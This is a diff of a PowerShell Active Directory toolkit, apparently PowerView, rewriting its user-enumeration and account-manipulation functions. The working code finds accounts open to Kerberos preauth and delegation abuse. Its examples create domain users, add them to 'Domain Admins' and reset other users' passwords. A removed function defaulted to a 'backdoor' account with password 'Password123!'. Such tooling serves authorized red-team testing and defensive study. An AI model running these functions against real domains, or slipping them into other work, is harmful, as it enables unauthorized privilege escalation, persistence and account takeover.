+.PARAMETER AdminCount
- .PARAMETER AdminCount
+Switch. Return users with '(adminCount=1)' (meaning are/were privileged).
- Switch. Return users with adminCount=1.
+.PARAMETER AllowDelegation
- .PARAMETER SPN
+Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation'
- Switch. Only return user objects with non-null service principal names.
+.PARAMETER DisallowDelegation
- .PARAMETER Unconstrained
+Switch. Return user accounts that are marked as 'sensitive and not allowed for delegation'
- Switch. Return users that have unconstrained delegation.
+.PARAMETER TrustedToAuth
- .PARAMETER AllowDelegation
+Switch. Return computer objects that are trusted to authenticate for other principals.
- Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation'
+.PARAMETER PreauthNotRequired
- .PARAMETER PageSize
+Switch. Return user accounts with "Do not require Kerberos preauthentication" set.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER Domain
- .PARAMETER Credential
+Specifies the domain to use for the query, defaults to the current domain.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.PARAMETER LDAPFilter
- .EXAMPLE
+Specifies an LDAP query string that is used to filter Active Directory objects.
- PS C:\> Get-NetUser -Domain testing
+.PARAMETER Properties
- .EXAMPLE
+Specifies the properties of the output object to retrieve from the server.
- PS C:\> Get-NetUser -ADSpath "LDAP://OU=secret,DC=testlab,DC=local"
-#>
+.PARAMETER SearchBase
- param(
- [Parameter(Position=0, ValueFromPipeline=$True)]
- [String]
- $UserName,
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- [String]
- $Domain,
+.PARAMETER Server
- [String]
- $DomainController,
+Specifies an Active Directory server (domain controller) to bind to.
- [String]
- $ADSpath,
+.PARAMETER SearchScope
- [String]
- $Filter,
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER SecurityMasks
+
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER FindOne
+
+Only return one result object.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.PARAMETER Raw
+
+Switch. Return raw results instead of translating the fields into a custom PSObject.
+
+.EXAMPLE
+
+Get-DomainUser -Domain testlab.local
+
+Return all users for the testlab.local domain
+
+.EXAMPLE
+
+Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator"
+
+Return the user with the given SID, as well as Administrator.
+
+.EXAMPLE
+
+'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
+
+lastlogoff samaccountname
+---------- --------------
+12/31/1600 4:00:00 PM dfm.a
+12/31/1600 4:00:00 PM dfm
+12/31/1600 4:00:00 PM harmj0y
+12/31/1600 4:00:00 PM Administrator
+
+.EXAMPLE
+
+Get-DomainUser -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -AdminCount -AllowDelegation
+
+Search the specified OU for privileged user (AdminCount = 1) that allow delegation
+
+.EXAMPLE
+
+Get-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
+
+Search for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon
+
+.EXAMPLE
+
+Get-DomainUser -UACFilter DONT_REQ_PREAUTH,NOT_PASSWORD_EXPIRED
+
+Find users who doesn't require Kerberos preauthentication and DON'T have an expired password.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainUser -Credential $Cred
+
+.EXAMPLE
+
+Get-Domain | Select-Object -Expand name
+testlab.local
+
+Get-DomainUser dev\user1 -Verbose -Properties distinguishedname
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=user1)))
+
+distinguishedname
+-----------------
+CN=user1,CN=Users,DC=dev,DC=testlab,DC=local
+
+.INPUTS
+
+String
+
+.OUTPUTS
+
+PowerView.User
+
+Custom PSObject with translated user property fields.
+
+PowerView.User.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.User')]
+ [OutputType('PowerView.User.Raw')]
+ [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+ [String[]]
+ $Identity,
[Switch]
$SPN,
@@ -2559,2450 +5034,4619 @@ function Get-NetUser {
[Switch]
$AdminCount,
+ [Parameter(ParameterSetName = 'AllowDelegation')]
[Switch]
- $Unconstrained,
+ $AllowDelegation,
+ [Parameter(ParameterSetName = 'DisallowDelegation')]
[Switch]
- $AllowDelegation,
+ $DisallowDelegation,
- [ValidateRange(1,10000)]
+ [Switch]
+ $TrustedToAuth,
+
+ [Alias('KerberosPreauthNotRequired', 'NoPreauth')]
+ [Switch]
+ $PreauthNotRequired,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ServerTimeLimit,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
+
+ [Switch]
+ $Tombstone,
+
+ [Alias('ReturnOne')]
+ [Switch]
+ $FindOne,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $Raw
)
- begin {
- # so this isn't repeated if users are passed on the pipeline
- $UserSearcher = Get-DomainSearcher -Domain $Domain -ADSpath $ADSpath -DomainController $DomainController -PageSize $PageSize -Credential $Credential
+ DynamicParam {
+ $UACValueNames = [Enum]::GetNames($UACEnum)
+ # add in the negations
+ $UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"}
+ # create new dynamic parameter
+ New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array])
}
- process {
- if($UserSearcher) {
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $UserSearcher = Get-DomainSearcher @SearcherArguments
+ }
+
+ PROCESS {
+ #bind dynamic parameter to a friendly variable
+ if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {
+ New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters
+ }
+
+ if ($UserSearcher) {
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match '^S-1-') {
+ $IdentityFilter += "(objectsid=$IdentityInstance)"
+ }
+ elseif ($IdentityInstance -match '^CN=') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainUser] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $UserSearcher = Get-DomainSearcher @SearcherArguments
+ if (-not $UserSearcher) {
+ Write-Warning "[Get-DomainUser] Unable to retrieve domain searcher for '$IdentityDomain'"
+ }
+ }
+ }
+ elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+ $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ elseif ($IdentityInstance.Contains('\')) {
+ $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
+ if ($ConvertedIdentityInstance) {
+ $UserDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
+ $UserName = $IdentityInstance.Split('\')[1]
+ $IdentityFilter += "(samAccountName=$UserName)"
+ $SearcherArguments['Domain'] = $UserDomain
+ Write-Verbose "[Get-DomainUser] Extracted domain '$UserDomain' from '$IdentityInstance'"
+ $UserSearcher = Get-DomainSearcher @SearcherArguments
+ }
+ }
+ else {
+ $IdentityFilter += "(samAccountName=$IdentityInstance)"
+ }
+ }
+
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+ $Filter += "(|$IdentityFilter)"
+ }
- # if we're checking for unconstrained delegation
- if($Unconstrained) {
- Write-Verbose "Checking for unconstrained delegation"
- $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
+ if ($PSBoundParameters['SPN']) {
+ Write-Verbose '[Get-DomainUser] Searching for non-null service principal names'
+ $Filter += '(servicePrincipalName=*)'
}
- if($AllowDelegation) {
- Write-Verbose "Checking for users who can be delegated"
+ if ($PSBoundParameters['AllowDelegation']) {
+ Write-Verbose '[Get-DomainUser] Searching for users who can be delegated'
# negation of "Accounts that are sensitive and not trusted for delegation"
- $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))"
+ $Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))'
}
- if($AdminCount) {
- Write-Verbose "Checking for adminCount=1"
- $Filter += "(admincount=1)"
+ if ($PSBoundParameters['DisallowDelegation']) {
+ Write-Verbose '[Get-DomainUser] Searching for users who are sensitive and not trusted for delegation'
+ $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=1048574)'
}
-
- # check if we're using a username filter or not
- if($UserName) {
- # samAccountType=805306368 indicates user objects
- $UserSearcher.filter="(&(samAccountType=805306368)(samAccountName=$UserName)$Filter)"
+ if ($PSBoundParameters['AdminCount']) {
+ Write-Verbose '[Get-DomainUser] Searching for adminCount=1'
+ $Filter += '(admincount=1)'
}
- elseif($SPN) {
- $UserSearcher.filter="(&(samAccountType=805306368)(servicePrincipalName=*)$Filter)"
+ if ($PSBoundParameters['TrustedToAuth']) {
+ Write-Verbose '[Get-DomainUser] Searching for users that are trusted to authenticate for other principals'
+ $Filter += '(msds-allowedtodelegateto=*)'
}
- else {
- # filter is something like "(samAccountName=*blah*)" if specified
- $UserSearcher.filter="(&(samAccountType=805306368)$Filter)"
+ if ($PSBoundParameters['PreauthNotRequired']) {
+ Write-Verbose '[Get-DomainUser] Searching for user accounts that do not require kerberos preauthenticate'
+ $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=4194304)'
+ }
+ if ($PSBoundParameters['LDAPFilter']) {
+ Write-Verbose "[Get-DomainUser] Using additional LDAP filter: $LDAPFilter"
+ $Filter += "$LDAPFilter"
+ }
+
+ # build the LDAP filter for the dynamic UAC filter value
+ $UACFilter | Where-Object {$_} | ForEach-Object {
+ if ($_ -match 'NOT_.*') {
+ $UACField = $_.Substring(4)
+ $UACValue = [Int]($UACEnum::$UACField)
+ $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))"
+ }
+ else {
+ $UACValue = [Int]($UACEnum::$_)
+ $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)"
+ }
}
- $Results = $UserSearcher.FindAll()
+ $UserSearcher.filter = "(&(samAccountType=805306368)$Filter)"
+ Write-Verbose "[Get-DomainUser] filter string: $($UserSearcher.filter)"
+
+ if ($PSBoundParameters['FindOne']) { $Results = $UserSearcher.FindOne() }
+ else { $Results = $UserSearcher.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
- # convert/process the LDAP fields for each result
- $User = Convert-LDAPProperty -Properties $_.Properties
- $User.PSObject.TypeNames.Add('PowerView.User')
+ if ($PSBoundParameters['Raw']) {
+ # return raw result objects
+ $User = $_
+ $User.PSObject.TypeNames.Insert(0, 'PowerView.User.Raw')
+ }
+ else {
+ $User = Convert-LDAPProperty -Properties $_.Properties
+ $User.PSObject.TypeNames.Insert(0, 'PowerView.User')
+ }
$User
}
- $Results.dispose()
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainUser] Error disposing of the Results object: $_"
+ }
+ }
$UserSearcher.dispose()
}
}
}
-function Add-NetUser {
+function New-DomainUser {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Creates a new domain user (assuming appropriate permissions) and returns the user object.
+
+TODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+.DESCRIPTION
+
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to create a new
+DirectoryServices.AccountManagement.UserPrincipal with the specified user properties.
- Adds a domain user or a local user to the current (or remote) machine,
- if permissions allow, utilizing the WinNT service provider and
- DirectoryServices.AccountManagement, respectively.
-
- The default behavior is to add a user to the local machine.
- An optional group name to add the user to can be specified.
+.PARAMETER SamAccountName
- .PARAMETER UserName
+Specifies the Security Account Manager (SAM) account name of the user to create.
+Maximum of 256 characters. Mandatory.
- The username to add. If not given, it defaults to 'backdoor'
+.PARAMETER AccountPassword
- .PARAMETER Password
+Specifies the password for the created user. Mandatory.
- The password to set for the added user. If not given, it defaults to 'Password123!'
+.PARAMETER Name
- .PARAMETER GroupName
+Specifies the name of the user to create. If not provided, defaults to SamAccountName.
- Group to optionally add the user to.
+.PARAMETER DisplayName
- .PARAMETER ComputerName
+Specifies the display name of the user to create. If not provided, defaults to SamAccountName.
- Hostname to add the local user to, defaults to 'localhost'
+.PARAMETER Description
- .PARAMETER Domain
+Specifies the description of the user to create.
- Specified domain to add the user to.
+.PARAMETER Domain
- .EXAMPLE
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
- PS C:\> Add-NetUser -UserName john -Password 'Password123!'
-
- Adds a localuser 'john' to the local machine with password of 'Password123!'
+.PARAMETER Credential
- .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- PS C:\> Add-NetUser -UserName john -Password 'Password123!' -ComputerName server.testlab.local
-
- Adds a localuser 'john' with password of 'Password123!' to server.testlab.local's local Administrators group.
+.EXAMPLE
- .EXAMPLE
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword
- PS C:\> Add-NetUser -UserName john -Password password -GroupName "Domain Admins" -Domain ''
-
- Adds the user "john" with password "password" to the current domain and adds
- the user to the domain group "Domain Admins"
+Creates the 'harmj0y2' user with the specified description and password.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Add-NetUser -UserName john -Password password -GroupName "Domain Admins" -Domain 'testing'
-
- Adds the user "john" with password "password" to the 'testing' domain and adds
- the user to the domain group "Domain Admins"
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred
- .Link
+Creates the 'harmj0y2' user with the specified description and password, using the specified
+alternate credentials.
- http://blogs.technet.com/b/heyscriptingguy/archive/2010/11/23/use-powershell-to-create-local-user-accounts.aspx
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred
+
+Creates the 'andy' user with the specified description and password, using the specified
+alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember
+and the alternate credentials.
+
+.OUTPUTS
+
+DirectoryServices.AccountManagement.UserPrincipal
+
+.LINK
+
+http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/
#>
- [CmdletBinding()]
- Param (
- [ValidateNotNullOrEmpty()]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('DirectoryServices.AccountManagement.UserPrincipal')]
+ Param(
+ [Parameter(Mandatory = $True)]
+ [ValidateLength(0, 256)]
[String]
- $UserName = 'backdoor',
+ $SamAccountName,
+ [Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
- [String]
- $Password = 'Password123!',
+ [Alias('Password')]
+ [Security.SecureString]
+ $AccountPassword,
[ValidateNotNullOrEmpty()]
[String]
- $GroupName,
+ $Name,
[ValidateNotNullOrEmpty()]
- [Alias('HostName')]
[String]
- $ComputerName = 'localhost',
+ $DisplayName,
[ValidateNotNullOrEmpty()]
[String]
- $Domain
- )
-
- if ($Domain) {
+ $Description,
- $DomainObject = Get-NetDomain -Domain $Domain
- if(-not $DomainObject) {
- Write-Warning "Error in grabbing $Domain object"
- return $Null
- }
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
- # add the assembly we need
- Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
- # http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/
- # get the domain context
- $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain), $DomainObject
+ $ContextArguments = @{
+ 'Identity' = $SamAccountName
+ }
+ if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
+ $Context = Get-PrincipalContext @ContextArguments
- # create the user object
- $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList $Context
+ if ($Context) {
+ $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context.Context)
- # set user properties
- $User.Name = $UserName
- $User.SamAccountName = $UserName
- $User.PasswordNotRequired = $False
- $User.SetPassword($Password)
+ # set all the appropriate user parameters
+ $User.SamAccountName = $Context.Identity
+ $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
+ $User.SetPassword($TempCred.GetNetworkCredential().Password)
$User.Enabled = $True
+ $User.PasswordNotRequired = $False
- Write-Verbose "Creating user $UserName to with password '$Password' in domain $Domain"
-
- try {
- # commit the user
- $User.Save()
- "[*] User $UserName successfully created in domain $Domain"
+ if ($PSBoundParameters['Name']) {
+ $User.Name = $Name
}
- catch {
- Write-Warning '[!] User already exists!'
- return
+ else {
+ $User.Name = $Context.Identity
+ }
+ if ($PSBoundParameters['DisplayName']) {
+ $User.DisplayName = $DisplayName
+ }
+ else {
+ $User.DisplayName = $Context.Identity
}
- }
- else {
-
- Write-Verbose "Creating user $UserName to with password '$Password' on $ComputerName"
- # if it's not a domain add, it's a local machine add
- $ObjOu = [ADSI]"WinNT://$ComputerName"
- $ObjUser = $ObjOu.Create('User', $UserName)
- $ObjUser.SetPassword($Password)
+ if ($PSBoundParameters['Description']) {
+ $User.Description = $Description
+ }
- # commit the changes to the local machine
+ Write-Verbose "[New-DomainUser] Attempting to create user '$SamAccountName'"
try {
- $Null = $ObjUser.SetInfo()
- "[*] User $UserName successfully created on host $ComputerName"
+ $Null = $User.Save()
+ Write-Verbose "[New-DomainUser] User '$SamAccountName' successfully created"
+ $User
}
catch {
- Write-Warning '[!] Account already exists!'
- return
- }
- }
-
- # if a group is specified, invoke Add-NetGroupUser and return its value
- if ($GroupName) {
- # if we're adding the user to a domain
- if ($Domain) {
- Add-NetGroupUser -UserName $UserName -GroupName $GroupName -Domain $Domain
- "[*] User $UserName successfully added to group $GroupName in domain $Domain"
- }
- # otherwise, we're adding to a local group
- else {
- Add-NetGroupUser -UserName $UserName -GroupName $GroupName -ComputerName $ComputerName
- "[*] User $UserName successfully added to group $GroupName on host $ComputerName"
+ Write-Warning "[New-DomainUser] Error creating user '$SamAccountName' : $_"
}
}
}
-function Add-NetGroupUser {
+function Set-DomainUserPassword {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Sets the password for a given user identity.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+.DESCRIPTION
+
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to search for the specified user -Identity,
+which returns a DirectoryServices.AccountManagement.UserPrincipal object. The
+SetPassword() function is then invoked on the user, setting the password to -AccountPassword.
- Adds a user to a domain group or a local group on the current (or remote) machine,
- if permissions allow, utilizing the WinNT service provider and
- DirectoryServices.AccountManagement, respectively.
+.PARAMETER Identity
- .PARAMETER UserName
+A user SamAccountName (e.g. User1), DistinguishedName (e.g. CN=user1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+specifying the user to reset the password for.
- The domain username to query for.
+.PARAMETER AccountPassword
- .PARAMETER GroupName
+Specifies the password to reset the target user's to. Mandatory.
- Group to add the user to.
+.PARAMETER Domain
- .PARAMETER ComputerName
+Specifies the domain to use to search for the user identity, defaults to the current domain.
- Hostname to add the user to, defaults to localhost.
+.PARAMETER Credential
- .PARAMETER Domain
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- Domain to add the user to.
+.EXAMPLE
- .EXAMPLE
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword
- PS C:\> Add-NetGroupUser -UserName john -GroupName Administrators
-
- Adds a localuser "john" to the local group "Administrators"
+Resets the password for 'andy' to the password specified.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Add-NetGroupUser -UserName john -GroupName "Domain Admins" -Domain dev.local
-
- Adds the existing user "john" to the domain group "Domain Admins" in "dev.local"
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred
+
+Resets the password for 'andy' usering the alternate credentials specified.
+
+.OUTPUTS
+
+DirectoryServices.AccountManagement.UserPrincipal
+
+.LINK
+
+http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/
#>
- [CmdletBinding()]
- param(
- [Parameter(Mandatory = $True)]
- [ValidateNotNullOrEmpty()]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('DirectoryServices.AccountManagement.UserPrincipal')]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True)]
+ [Alias('UserName', 'UserIdentity', 'User')]
[String]
- $UserName,
+ $Identity,
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
- [String]
- $GroupName,
+ [Alias('Password')]
+ [Security.SecureString]
+ $AccountPassword,
[ValidateNotNullOrEmpty()]
- [Alias('HostName')]
[String]
- $ComputerName,
+ $Domain,
- [String]
- $Domain
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- # add the assembly if we need it
- Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+ $ContextArguments = @{ 'Identity' = $Identity }
+ if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
+ $Context = Get-PrincipalContext @ContextArguments
- # if we're adding to a remote host's local group, use the WinNT provider
- if($ComputerName -and ($ComputerName -ne "localhost")) {
- try {
- Write-Verbose "Adding user $UserName to $GroupName on host $ComputerName"
- ([ADSI]"WinNT://$ComputerName/$GroupName,group").add("WinNT://$ComputerName/$UserName,user")
- "[*] User $UserName successfully added to group $GroupName on $ComputerName"
- }
- catch {
- Write-Warning "[!] Error adding user $UserName to group $GroupName on $ComputerName"
- return
- }
- }
+ if ($Context) {
+ $User = [System.DirectoryServices.AccountManagement.UserPrincipal]::FindByIdentity($Context.Context, $Identity)
- # otherwise it's a local machine or domain add
- else {
- try {
- if ($Domain) {
- Write-Verbose "Adding user $UserName to $GroupName on domain $Domain"
- $CT = [System.DirectoryServices.AccountManagement.ContextType]::Domain
- $DomainObject = Get-NetDomain -Domain $Domain
- if(-not $DomainObject) {
- return $Null
- }
- # get the full principal context
- $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList $CT, $DomainObject
+ if ($User) {
+ Write-Verbose "[Set-DomainUserPassword] Attempting to set the password for user '$Identity'"
+ try {
+ $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
+ $User.SetPassword($TempCred.GetNetworkCredential().Password)
+
+ $Null = $User.Save()
+ Write-Verbose "[Set-DomainUserPassword] Password for user '$Identity' successfully reset"
}
- else {
- # otherwise, get the local machine context
- Write-Verbose "Adding user $UserName to $GroupName on localhost"
- $Context = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine, $Env:ComputerName)
+ catch {
+ Write-Warning "[Set-DomainUserPassword] Error setting password for user '$Identity' : $_"
}
-
- # find the particular group
- $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($Context,$GroupName)
-
- # add the particular user to the group
- $Group.Members.add($Context, [System.DirectoryServices.AccountManagement.IdentityType]::SamAccountName, $UserName)
-
- # commit the changes
- $Group.Save()
}
- catch {
- Write-Warning "Error adding $UserName to $GroupName : $_"
+ else {
+ Write-Warning "[Set-DomainUserPassword] Unable to find user '$Identity'"
}
}
}
-function Get-UserProperty {
+function Get-DomainUserEvent {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Enumerate account logon events (ID 4624) and Logon with explicit credential
+events (ID 4648) from the specified host (default of the localhost).
+
+Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
- Returns a list of all user object properties. If a property
- name is specified, it returns all [user:property] values.
+.DESCRIPTION
- Taken directly from @obscuresec's post:
- http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html
+This function uses an XML path filter passed to Get-WinEvent to retrieve
+security events with IDs of 4624 (logon events) or 4648 (explicit credential
+logon events) from -StartTime (default of now-1 day) to -EndTime (default of now).
+A maximum of -MaxEvents (default of 5000) are returned.
- .PARAMETER Properties
+.PARAMETER ComputerName
- Property names to extract for users.
+Specifies the computer name to retrieve events from, default of localhost.
- .PARAMETER Domain
+.PARAMETER StartTime
- The domain to query for user properties, defaults to the current domain.
+The [DateTime] object representing the start of when to collect events.
+Default of [DateTime]::Now.AddDays(-1).
